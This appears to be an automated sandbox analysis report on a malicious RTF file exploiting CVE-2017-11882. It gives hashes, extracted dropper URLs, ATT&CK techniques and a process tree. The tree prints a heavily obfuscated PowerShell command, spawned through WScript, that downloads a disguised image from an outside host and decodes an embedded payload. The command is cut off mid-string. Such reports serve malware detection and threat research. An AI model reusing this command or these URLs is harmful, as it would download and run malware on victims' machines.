afc0b66dfb71b33dca6e88ae7000618324f24d1a4065b0498176ae52697e2ea9

General

Target

SecuriteInfo.com.Exploit.CVE-2017-11882.123.31284.7634.rtf
Size

75KB
MD5

01ee2a10ee91efdcf290d48901cbc8d1
SHA1

2de45d650386fea4e9f4aef72c838506b9587b26
SHA256

afc0b66dfb71b33dca6e88ae7000618324f24d1a4065b0498176ae52697e2ea9
SHA512

2ebf95de6fca7f3fff5ae1821a12a7c61bf3217f247a4f1291594dcff97e6bcaae839d76e9e87de5d6927ca2e27a922e819d75a220bcff805514889cd3472a84
SSDEEP

768:qjHyc/4Q2Q8hXrVN6BKYyaXRD6vJYnD6/:M/aQ8fYQvJSm/

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

exe.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	2320	EQNEDT32.EXE
6	2584	powershell.exe
7	2584	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2884	powershell.exe
2584	powershell.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EQNEDT32.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
2320	EQNEDT32.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2980	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2884	powershell.exe
2584	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2884	powershell.exe
Token: SeDebugPrivilege	2584	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2980	WINWORD.EXE
2980	WINWORD.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2320 wrote to memory of 2704	2320	EQNEDT32.EXE	32
PID 2320 wrote to memory of 2704	2320	EQNEDT32.EXE	32
PID 2320 wrote to memory of 2704	2320	EQNEDT32.EXE	32
PID 2320 wrote to memory of 2704	2320	EQNEDT32.EXE	32
PID 2704 wrote to memory of 2884	2704	WScript.exe	34
PID 2704 wrote to memory of 2884	2704	WScript.exe	34
PID 2704 wrote to memory of 2884	2704	WScript.exe	34
PID 2704 wrote to memory of 2884	2704	WScript.exe	34
PID 2884 wrote to memory of 2584	2884	powershell.exe	36
PID 2884 wrote to memory of 2584	2884	powershell.exe	36
PID 2884 wrote to memory of 2584	2884	powershell.exe	36
PID 2884 wrote to memory of 2584	2884	powershell.exe	36
PID 2980 wrote to memory of 580	2980	WINWORD.EXE	37
PID 2980 wrote to memory of 580	2980	WINWORD.EXE	37
PID 2980 wrote to memory of 580	2980	WINWORD.EXE	37
PID 2980 wrote to memory of 580	2980	WINWORD.EXE	37

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.CVE-2017-11882.123.31284.7634.rtf"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2980
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:580

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2320
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\buttersweetnessgoodforhealthtose.vBS"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2704
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⟽ ⮦ ꜃ ⤎ ䷙Bp⟽ ⮦ ꜃ ⤎ ䷙G0⟽ ⮦ ꜃ ⤎ ䷙YQBn⟽ ⮦ ꜃ ⤎ ䷙GU⟽ ⮦ ꜃ ⤎ ䷙VQBy⟽ ⮦ ꜃ ⤎ ䷙Gw⟽ ⮦ ꜃ ⤎ ䷙I⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙9⟽ ⮦ ꜃ ⤎ ䷙C⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙JwBo⟽ ⮦ ꜃ ⤎ ䷙HQ⟽ ⮦ ꜃ ⤎ ䷙d⟽ ⮦ ꜃ ⤎ ䷙Bw⟽ ⮦ ꜃ ⤎ ䷙HM⟽ ⮦ ꜃ ⤎ ䷙Og⟽ ⮦ ꜃ ⤎ ䷙v⟽ ⮦ ꜃ ⤎ ䷙C8⟽ ⮦ ꜃ ⤎ ䷙aQBh⟽ ⮦ ꜃ ⤎ ䷙Dg⟽ ⮦ ꜃ ⤎ ䷙M⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙z⟽ ⮦ ꜃ ⤎ ䷙DE⟽ ⮦ ꜃ ⤎ ䷙M⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙0⟽ ⮦ ꜃ ⤎ ䷙C4⟽ ⮦ ꜃ ⤎ ䷙dQBz⟽ ⮦ ꜃ ⤎ ䷙C4⟽ ⮦ ꜃ ⤎ ䷙YQBy⟽ ⮦ ꜃ ⤎ ䷙GM⟽ ⮦ ꜃ ⤎ ䷙a⟽ ⮦ ꜃ ⤎ ䷙Bp⟽ ⮦ ꜃ ⤎ ䷙HY⟽ ⮦ ꜃ ⤎ ䷙ZQ⟽ ⮦ ꜃ ⤎ ䷙u⟽ ⮦ ꜃ ⤎ ䷙G8⟽ ⮦ ꜃ ⤎ ䷙cgBn⟽ ⮦ ꜃ ⤎ ䷙C8⟽ ⮦ ꜃ ⤎ ䷙Mg⟽ ⮦ ꜃ ⤎ ䷙3⟽ ⮦ ꜃ ⤎ ䷙C8⟽ ⮦ ꜃ ⤎ ䷙aQB0⟽ ⮦ ꜃ ⤎ ䷙GU⟽ ⮦ ꜃ ⤎ ䷙bQBz⟽ ⮦ ꜃ ⤎ ䷙C8⟽ ⮦ ꜃ ⤎ ䷙dgBi⟽ ⮦ ꜃ ⤎ ䷙HM⟽ ⮦ ꜃ ⤎ ䷙Xw⟽ ⮦ ꜃ ⤎ ䷙y⟽ ⮦ ꜃ ⤎ ䷙D⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙Mg⟽ ⮦ ꜃ ⤎ ䷙0⟽ ⮦ ꜃ ⤎ ䷙D⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙Nw⟽ ⮦ ꜃ ⤎ ䷙y⟽ ⮦ ꜃ ⤎ ䷙DY⟽ ⮦ ꜃ ⤎ ䷙Xw⟽ ⮦ ꜃ ⤎ ䷙y⟽ ⮦ ꜃ ⤎ ䷙D⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙Mg⟽ ⮦ ꜃ ⤎ ䷙0⟽ ⮦ ꜃ ⤎ ䷙D⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙Nw⟽ ⮦ ꜃ ⤎ ䷙y⟽ ⮦ ꜃ ⤎ ䷙DY⟽ ⮦ ꜃ ⤎ ䷙LwB2⟽ ⮦ ꜃ ⤎ ䷙GI⟽ ⮦ ꜃ ⤎ ䷙cw⟽ ⮦ ꜃ ⤎ ䷙u⟽ ⮦ ꜃ ⤎ ䷙Go⟽ ⮦ ꜃ ⤎ ䷙c⟽ ⮦ ꜃ ⤎ ䷙Bn⟽ ⮦ ꜃ ⤎ ䷙Cc⟽ ⮦ ꜃ ⤎ ䷙Ow⟽ ⮦ ꜃ ⤎ ䷙k⟽ ⮦ ꜃ ⤎ ䷙Hc⟽ ⮦ ꜃ ⤎ ䷙ZQBi⟽ ⮦ ꜃ ⤎ ䷙EM⟽ ⮦ ꜃ ⤎ ䷙b⟽ ⮦ ꜃ ⤎ ䷙Bp⟽ ⮦ ꜃ ⤎ ䷙GU⟽ ⮦ ꜃ ⤎ ䷙bgB0⟽ ⮦ ꜃ ⤎ ䷙C⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙PQ⟽ ⮦ ꜃ ⤎ ䷙g⟽ ⮦ ꜃ ⤎ ䷙E4⟽ ⮦ ꜃ ⤎ ䷙ZQB3⟽ ⮦ ꜃ ⤎ ䷙C0⟽ ⮦ ꜃ ⤎ ䷙TwBi⟽ ⮦ ꜃ ⤎ ䷙Go⟽ ⮦ ꜃ ⤎ ䷙ZQBj⟽ ⮦ ꜃ ⤎ ䷙HQ⟽ ⮦ ꜃ ⤎ ䷙I⟽ ⮦ ꜃ ⤎ ䷙BT⟽ ⮦ ꜃ ⤎ ䷙Hk⟽ ⮦ ꜃ ⤎ ䷙cwB0⟽ ⮦ ꜃ ⤎ ䷙GU⟽ ⮦ ꜃ ⤎ ䷙bQ⟽ ⮦ ꜃ ⤎ ䷙u⟽ ⮦ ꜃ ⤎ ䷙E4⟽ ⮦ ꜃ ⤎ ䷙ZQB0⟽ ⮦ ꜃ ⤎ ䷙C4⟽ ⮦ ꜃ ⤎ ䷙VwBl⟽ ⮦ ꜃ ⤎ ䷙GI⟽ ⮦ ꜃ ⤎ ䷙QwBs⟽ ⮦ ꜃ ⤎ ䷙Gk⟽ ⮦ ꜃ ⤎ ䷙ZQBu⟽ ⮦ ꜃ ⤎ ䷙HQ⟽ ⮦ ꜃ ⤎ ䷙Ow⟽ ⮦ ꜃ ⤎ ䷙k⟽ ⮦ ꜃ ⤎ ䷙Gk⟽ ⮦ ꜃ ⤎ ䷙bQBh⟽ ⮦ ꜃ ⤎ ䷙Gc⟽ ⮦ ꜃ ⤎ ䷙ZQBC⟽ ⮦ ꜃ ⤎ ䷙Hk⟽ ⮦ ꜃ ⤎ ䷙d⟽ ⮦ ꜃ ⤎ ䷙Bl⟽ ⮦ ꜃ ⤎ ䷙HM⟽ ⮦ ꜃ ⤎ ䷙I⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙9⟽ ⮦ ꜃ ⤎ ䷙C⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙J⟽ ⮦ ꜃ ⤎ ䷙B3⟽ ⮦ ꜃ ⤎ ䷙GU⟽ ⮦ ꜃ ⤎ ䷙YgBD⟽ ⮦ ꜃ ⤎ ䷙Gw⟽ ⮦ ꜃ ⤎ ䷙aQBl⟽ ⮦ ꜃ ⤎ ䷙G4⟽ ⮦ ꜃ ⤎ ䷙d⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙u⟽ ⮦ ꜃ ⤎ ䷙EQ⟽ ⮦ ꜃ ⤎ ䷙bwB3⟽ ⮦ ꜃ ⤎ ䷙G4⟽ ⮦ ꜃ ⤎ ䷙b⟽ ⮦ ꜃ ⤎ ䷙Bv⟽ ⮦ ꜃ ⤎ ䷙GE⟽ ⮦ ꜃ ⤎ ䷙Z⟽ ⮦ ꜃ ⤎ ䷙BE⟽ ⮦ ꜃ ⤎ ䷙GE⟽ ⮦ ꜃ ⤎ ䷙d⟽ ⮦ ꜃ ⤎ ䷙Bh⟽ ⮦ ꜃ ⤎ ䷙Cg⟽ ⮦ ꜃ ⤎ ䷙J⟽ ⮦ ꜃ ⤎ ䷙Bp⟽ ⮦ ꜃ ⤎ ䷙G0⟽ ⮦ ꜃ ⤎ ䷙YQBn⟽ ⮦ ꜃ ⤎ ䷙GU⟽ ⮦ ꜃ ⤎ ䷙VQBy⟽ ⮦ ꜃ ⤎ ䷙Gw⟽ ⮦ ꜃ ⤎ ䷙KQ⟽ ⮦ ꜃ ⤎ ䷙7⟽ ⮦ ꜃ ⤎ ䷙CQ⟽ ⮦ ꜃ ⤎ ䷙aQBt⟽ ⮦ ꜃ ⤎ ䷙GE⟽ ⮦ ꜃ ⤎ ䷙ZwBl⟽ ⮦ ꜃ ⤎ ䷙FQ⟽ ⮦ ꜃ ⤎ ䷙ZQB4⟽ ⮦ ꜃ ⤎ ䷙HQ⟽ ⮦ ꜃ ⤎ ䷙I⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙9⟽ ⮦ ꜃ ⤎ ䷙C⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙WwBT⟽ ⮦ ꜃ ⤎ ䷙Hk⟽ ⮦ ꜃ ⤎ ䷙cwB0⟽ ⮦ ꜃ ⤎ ䷙GU⟽ ⮦ ꜃ ⤎ ䷙bQ⟽ ⮦ ꜃ ⤎ ䷙u⟽ ⮦ ꜃ ⤎ ䷙FQ⟽ ⮦ ꜃ ⤎ ䷙ZQB4⟽ ⮦ ꜃ ⤎ ䷙HQ⟽ ⮦ ꜃ ⤎ ䷙LgBF⟽ ⮦ ꜃ ⤎ ䷙G4⟽ ⮦ ꜃ ⤎ ䷙YwBv⟽ ⮦ ꜃ ⤎ ䷙GQ⟽ ⮦ ꜃ ⤎ ䷙aQBu⟽ ⮦ ꜃ ⤎ ䷙Gc⟽ ⮦ ꜃ ⤎ ䷙XQ⟽ ⮦ ꜃ ⤎ ䷙6⟽ ⮦ ꜃ ⤎ ䷙Do⟽ ⮦ ꜃ ⤎ ䷙VQBU⟽ ⮦ ꜃ ⤎ ䷙EY⟽ ⮦ ꜃ ⤎ ䷙O⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙u⟽ ⮦ ꜃ ⤎ ䷙Ec⟽ ⮦ ꜃ ⤎ ䷙ZQB0⟽ ⮦ ꜃ ⤎ ䷙FM⟽ ⮦ ꜃ ⤎ ䷙d⟽ ⮦ ꜃ ⤎ ䷙By⟽ ⮦ ꜃ ⤎ ䷙Gk⟽ ⮦ ꜃ ⤎ ䷙bgBn⟽ ⮦ ꜃ ⤎ ䷙Cg⟽ ⮦ ꜃ ⤎ ䷙J⟽ ⮦ ꜃ ⤎ ䷙Bp⟽ ⮦ ꜃ ⤎ ䷙G0⟽ ⮦ ꜃ ⤎ ䷙YQBn⟽ ⮦ ꜃ ⤎ ䷙GU⟽ ⮦ ꜃ ⤎ ䷙QgB5⟽ ⮦ ꜃ ⤎ ䷙HQ⟽ ⮦ ꜃ ⤎ ䷙ZQBz⟽ ⮦ ꜃ ⤎ ䷙Ck⟽ ⮦ ꜃ ⤎ ䷙Ow⟽ ⮦ ꜃ ⤎ ䷙k⟽ ⮦ ꜃ ⤎ ䷙HM⟽ ⮦ ꜃ ⤎ ䷙d⟽ ⮦ ꜃ ⤎ ䷙Bh⟽ ⮦ ꜃ ⤎ ䷙HI⟽ ⮦ ꜃ ⤎ ䷙d⟽ ⮦ ꜃ ⤎ ䷙BG⟽ ⮦ ꜃ ⤎ ䷙Gw⟽ ⮦ ꜃ ⤎ ䷙YQBn⟽ ⮦ ꜃ ⤎ ䷙C⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙PQ⟽ ⮦ ꜃ ⤎ ䷙g⟽ ⮦ ꜃ ⤎ ䷙Cc⟽ ⮦ ꜃ ⤎ ䷙P⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙8⟽ ⮦ ꜃ ⤎ ䷙EI⟽ ⮦ ꜃ ⤎ ䷙QQBT⟽ ⮦ ꜃ ⤎ ䷙EU⟽ ⮦ ꜃ ⤎ ䷙Ng⟽ ⮦ ꜃ ⤎ ䷙0⟽ ⮦ ꜃ ⤎ ䷙F8⟽ ⮦ ꜃ ⤎ ䷙UwBU⟽ ⮦ ꜃ ⤎ ䷙EE⟽ ⮦ ꜃ ⤎ ䷙UgBU⟽ ⮦ ꜃ ⤎ ䷙D4⟽ ⮦ ꜃ ⤎ ䷙Pg⟽ ⮦ ꜃ ⤎ ䷙n⟽ ⮦ ꜃ ⤎ ䷙Ds⟽ ⮦ ꜃ ⤎ ䷙J⟽ ⮦ ꜃ ⤎ ䷙Bl⟽ ⮦ ꜃ ⤎ ䷙G4⟽ ⮦ ꜃ ⤎ ䷙Z⟽ ⮦ ꜃ ⤎ ䷙BG⟽ ⮦ ꜃ ⤎ ䷙Gw⟽ ⮦ ꜃ ⤎ ䷙YQBn⟽ ⮦ ꜃ ⤎ ䷙C⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙PQ⟽ ⮦ ꜃ ⤎ ䷙g⟽ ⮦ ꜃ ⤎ ䷙Cc⟽ ⮦ ꜃ ⤎ ䷙P⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙8⟽ ⮦ ꜃ ⤎ ䷙EI⟽ ⮦ ꜃ ⤎ ䷙QQBT⟽ ⮦ ꜃ ⤎ ䷙EU⟽ ⮦ ꜃ ⤎ ䷙Ng⟽ ⮦ ꜃ ⤎ ䷙0⟽ ⮦ ꜃ ⤎ ䷙F8⟽ ⮦ ꜃ ⤎ ䷙RQBO⟽ ⮦ ꜃ ⤎ ䷙EQ⟽ ⮦ ꜃ ⤎ ䷙Pg⟽ ⮦ ꜃ ⤎ ䷙+⟽ ⮦ ꜃ ⤎ ䷙Cc⟽ ⮦ ꜃ ⤎ ䷙Ow⟽ ⮦ ꜃ ⤎ ䷙k⟽ ⮦ ꜃ ⤎ ䷙HM⟽ ⮦ ꜃ ⤎ ䷙d⟽ ⮦ ꜃ ⤎ ䷙Bh⟽ ⮦ ꜃ ⤎ ䷙HI⟽ ⮦ ꜃ ⤎ ䷙d⟽ ⮦ ꜃ ⤎ ䷙BJ⟽ ⮦ ꜃ ⤎ ䷙G4⟽ ⮦ ꜃ ⤎ ䷙Z⟽ ⮦ ꜃ ⤎ ䷙Bl⟽ ⮦ ꜃ ⤎ ䷙Hg⟽ ⮦ ꜃ ⤎ ䷙I⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙9⟽ ⮦ ꜃ ⤎ ䷙C⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙J⟽ ⮦ ꜃ ⤎ ䷙Bp⟽ ⮦ ꜃ ⤎ ䷙G0⟽ ⮦ ꜃ ⤎ ䷙YQBn⟽ ⮦ ꜃ ⤎ ䷙GU⟽ ⮦ ꜃ ⤎ ䷙V⟽ ⮦ ꜃ ⤎ ䷙Bl⟽ ⮦ ꜃ ⤎ ䷙Hg⟽ ⮦ ꜃ ⤎ ䷙d⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙u⟽ ⮦ ꜃ ⤎ ䷙Ek⟽ ⮦ ꜃ ⤎ ䷙bgBk⟽ ⮦ ꜃ ⤎ ䷙GU⟽ ⮦ ꜃ ⤎ ䷙e⟽ ⮦ ꜃ ⤎ ䷙BP⟽ ⮦ ꜃ ⤎ ䷙GY⟽ ⮦ ꜃ ⤎ ䷙K⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙k⟽ ⮦ ꜃ ⤎ ䷙HM⟽ ⮦ ꜃ ⤎ ䷙d⟽ ⮦ ꜃ ⤎ ䷙Bh⟽ ⮦ ꜃ ⤎ ䷙HI⟽ ⮦ ꜃ ⤎ ䷙d⟽ ⮦ ꜃ ⤎ ䷙BG⟽ ⮦ ꜃ ⤎ ䷙Gw⟽ ⮦ ꜃ ⤎ ䷙YQBn⟽ ⮦ ꜃ ⤎ ䷙Ck⟽ ⮦ ꜃ ⤎ ䷙Ow⟽ ⮦ ꜃ ⤎ ䷙k⟽ ⮦ ꜃ ⤎ ䷙GU⟽ ⮦ ꜃ ⤎ ䷙bgBk⟽ ⮦ ꜃ ⤎ ䷙Ek⟽ ⮦ ꜃ ⤎ ䷙bgBk⟽ ⮦ ꜃ ⤎ ䷙GU⟽ ⮦ ꜃ ⤎ ䷙e⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙g⟽ ⮦ ꜃ ⤎ ䷙D0⟽ ⮦ ꜃ ⤎ ䷙I⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙k⟽ ⮦ ꜃ ⤎ ䷙Gk⟽ ⮦ ꜃ ⤎ ䷙bQBh⟽ ⮦ ꜃ ⤎ ䷙Gc⟽ ⮦ ꜃ ⤎ ䷙ZQBU⟽ ⮦ ꜃ ⤎ ䷙GU⟽ ⮦ ꜃ ⤎ ䷙e⟽ ⮦ ꜃ ⤎ ䷙B0⟽ ⮦ ꜃ ⤎ ䷙C4⟽ ⮦ ꜃ ⤎ ䷙SQBu⟽ ⮦ ꜃ ⤎ ䷙GQ⟽ ⮦ ꜃ ⤎ ䷙ZQB4⟽ ⮦ ꜃ ⤎ ䷙E8⟽ ⮦ ꜃ ⤎ ䷙Zg⟽ ⮦ ꜃ ⤎ ䷙o⟽ ⮦ ꜃ ⤎ ䷙CQ⟽ ⮦ ꜃ ⤎ ䷙ZQBu⟽ ⮦ ꜃ ⤎ ䷙GQ⟽ ⮦ ꜃ ⤎ ䷙RgBs⟽ ⮦ ꜃ ⤎ ䷙GE⟽ ⮦ ꜃ ⤎ ䷙Zw⟽ ⮦ ꜃ ⤎ ䷙p⟽ ⮦ ꜃ ⤎ ䷙Ds⟽ ⮦ ꜃ ⤎ ䷙J⟽ ⮦ ꜃ ⤎ ䷙Bz⟽ ⮦ ꜃ ⤎ ䷙HQ⟽ ⮦ ꜃ ⤎ ䷙YQBy⟽ ⮦ ꜃ ⤎ ䷙HQ⟽ ⮦ ꜃ ⤎ ䷙SQBu⟽ ⮦ ꜃ ⤎ ䷙GQ⟽ ⮦ ꜃ ⤎ ䷙ZQB4⟽ ⮦ ꜃ ⤎ ䷙C⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙LQBn⟽ ⮦ ꜃ ⤎ ䷙GU⟽ ⮦ ꜃ ⤎ ䷙I⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙w⟽ ⮦ ꜃ ⤎ ䷙C⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙LQBh⟽ ⮦ ꜃ ⤎ ䷙G4⟽ ⮦ ꜃ ⤎ ䷙Z⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙g⟽ ⮦ ꜃ ⤎ ䷙CQ⟽ ⮦ ꜃ ⤎ ䷙ZQBu⟽ ⮦ ꜃ ⤎ ䷙GQ⟽ ⮦ ꜃ ⤎ ䷙SQBu⟽ ⮦ ꜃ ⤎ ䷙GQ⟽ ⮦ ꜃ ⤎ ䷙ZQB4⟽ ⮦ ꜃ ⤎ ䷙C⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙LQBn⟽ ⮦ ꜃ ⤎ ䷙HQ⟽ ⮦ ꜃ ⤎ ䷙I⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙k⟽ ⮦ ꜃ ⤎ ䷙HM⟽ ⮦ ꜃ ⤎ ䷙d⟽ ⮦ ꜃ ⤎ ䷙Bh⟽ ⮦ ꜃ ⤎ ䷙HI⟽ ⮦ ꜃ ⤎ ䷙d⟽ ⮦ ꜃ ⤎ ䷙BJ⟽ ⮦ ꜃ ⤎ ䷙G4⟽ ⮦ ꜃ ⤎ ䷙Z⟽ ⮦ ꜃ ⤎ ䷙Bl⟽ ⮦ ꜃ ⤎ ䷙Hg⟽ ⮦ ꜃ ⤎ ䷙Ow⟽ ⮦ ꜃ ⤎ ䷙k⟽ ⮦ ꜃ ⤎ ䷙HM⟽ ⮦ ꜃ ⤎ ䷙d⟽ ⮦ ꜃ ⤎ ䷙Bh⟽ ⮦ ꜃ ⤎ ䷙HI⟽ ⮦ ꜃ ⤎ ䷙d⟽ ⮦ ꜃ ⤎ ䷙BJ⟽ ⮦ ꜃ ⤎ ䷙G4⟽ ⮦ ꜃ ⤎ ䷙Z⟽ ⮦ ꜃ ⤎ ䷙Bl⟽ ⮦ ꜃ ⤎ ䷙Hg⟽ ⮦ ꜃ ⤎ ䷙I⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙r⟽ ⮦ ꜃ ⤎ ䷙D0⟽ ⮦ ꜃ ⤎ ䷙I⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙k⟽ ⮦ ꜃ ⤎ ䷙HM⟽ ⮦ ꜃ ⤎ ䷙d⟽ ⮦ ꜃ ⤎ ䷙Bh⟽ ⮦ ꜃ ⤎ ䷙HI⟽ ⮦ ꜃ ⤎ ䷙d⟽ ⮦ ꜃ ⤎ ䷙BG⟽ ⮦ ꜃ ⤎ ䷙Gw⟽ ⮦ ꜃ ⤎ ䷙YQBn⟽ ⮦ ꜃ ⤎ ䷙C4⟽ ⮦ ꜃ ⤎ ䷙T⟽ ⮦ ꜃ ⤎ ䷙Bl⟽ ⮦ ꜃ ⤎ ䷙G4⟽ ⮦ ꜃ ⤎ ䷙ZwB0⟽ ⮦ ꜃ ⤎ ䷙Gg⟽ ⮦ ꜃ ⤎ ䷙Ow⟽ ⮦ ꜃ ⤎ ䷙k⟽ ⮦ ꜃ ⤎ ䷙GI⟽ ⮦ ꜃ ⤎ ䷙YQBz⟽ ⮦ ꜃ ⤎ ䷙GU⟽ ⮦ ꜃ ⤎ ䷙Ng⟽ ⮦ ꜃ ⤎ ䷙0⟽ ⮦ ꜃ ⤎ ䷙Ew⟽ ⮦ ꜃ ⤎ ䷙ZQBu⟽ ⮦ ꜃ ⤎ ䷙Gc⟽ ⮦ ꜃ ⤎ ䷙d⟽ ⮦ ꜃ ⤎ ䷙Bo⟽ ⮦ ꜃ ⤎ ䷙C⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙PQ⟽ ⮦ ꜃ ⤎ ䷙g⟽ ⮦ ꜃ ⤎ ䷙CQ⟽ ⮦ ꜃ ⤎ ䷙ZQBu⟽ ⮦ ꜃ ⤎ ䷙GQ⟽ ⮦ ꜃ ⤎ ䷙SQBu⟽ ⮦ ꜃ ⤎ ䷙GQ⟽ ⮦ ꜃ ⤎ ䷙ZQB4⟽ ⮦ ꜃ ⤎ ䷙C⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙LQ⟽ ⮦ ꜃ ⤎ ䷙g⟽ ⮦ ꜃ ⤎ ䷙CQ⟽ ⮦ ꜃ ⤎ ䷙cwB0⟽ ⮦ ꜃ ⤎ ䷙GE⟽ ⮦ ꜃ ⤎ ䷙cgB0⟽ ⮦ ꜃ ⤎ ䷙Ek⟽ ⮦ ꜃ ⤎ ䷙bgBk⟽ ⮦ ꜃ ⤎ ䷙GU⟽ ⮦ ꜃ ⤎ ䷙e⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙7⟽ ⮦ ꜃ ⤎ ䷙CQ⟽ ⮦ ꜃ ⤎ ䷙YgBh⟽ ⮦ ꜃ ⤎ ䷙HM⟽ ⮦ ꜃ ⤎ ䷙ZQ⟽ ⮦ ꜃ ⤎ ䷙2⟽ ⮦ ꜃ ⤎ ䷙DQ⟽ ⮦ ꜃ ⤎ ䷙QwBv⟽ ⮦ ꜃ ⤎ ䷙G0⟽ ⮦ ꜃ ⤎ ䷙bQBh⟽ ⮦ ꜃ ⤎ ䷙G4⟽ ⮦ ꜃ ⤎ ䷙Z⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙g⟽ ⮦ ꜃ ⤎ ䷙D0⟽ 